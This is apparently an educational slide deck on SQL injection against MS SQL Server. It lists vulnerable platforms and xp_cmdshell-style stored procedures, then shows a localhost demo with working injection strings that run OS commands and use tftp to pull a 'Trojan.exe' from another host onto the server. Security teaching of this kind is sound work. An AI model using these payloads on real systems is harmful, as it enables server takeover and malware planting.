Advanced Exploitation

using SQL Injection

By Varun Duggal

Work in Application Security Domain

SQL Injection The ability to inject SQL commands into the database engine through an

existing application

SQL Injection occurs when user-supplied data is sent to an interpreter as part of a command or query

Attackers trick the interpreter into executing unintended commands via supplying specially crafted data

Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application

Vulnerable Applications Almost all SQL databases and programming languages are potentially

vulnerable

MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc

Accessed through applications developed using:

Perl and CGI scripts that access databases

ASP, JSP, PHP

XML, XSL and XSQL

Javascript

VB, MFC, and other ODBC-based tools and APIs

DB specific Web-based applications and API‟s

Reports and DB Applications

3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)

many more

Stored procedure

A stored procedure is a subroutine available to applications accessing a relational database system

Stored procedures (sometimes called a sproc or SP) are actually stored in the database data dictionary

Exploiting the Vulnerability

xp_cmdshell stored procedure, which is built into MS-SQL by Default

Allows users to execute operating system commands

Tasks

Executing any type OS commands

Ping Server

Directory Listing

Create File

Defacing Website

Execute Applications

Upload and Download files

More Stored Procedures (xp_cmdshell)

(xp_regread)

(xp_servicecontrol)

(xp_availablemedia)

(xp_enumdsn)

(xp_loginconfig)

(xp_makecab)

(xp_ntsec_enumdomains)

(xp_terminate_process)

Demo

Test Bench

O. S : Windows XP Professional

Frontend: ASP

Backend: MSSQL 2000

Web Server: IIS 5.0

Open the URL in the http://localhost/sql.asp?id=1

Checking Vulnerable or Not Enter a single quote in the id parameter the error message indicates

it‟s vulnerable to SQL Injection.

Now open the URL and run the command

„;exec master..xp_cmdshell “ ipconfig > c:\inetpub\wwwroot\test.txt”--

Now finally file created on the web server access that file as shown in the below snapshot:

Upload a file on the server

Open tftp server containing malicious code to be uploaded

Now open the URL and run the command

„;exec master..xp_cmdshell “tftp –i 192.168.1.5 GET Trojan.exe C:\Trojan.exe”--

Logs of Tftp shows file gets uploaded on the server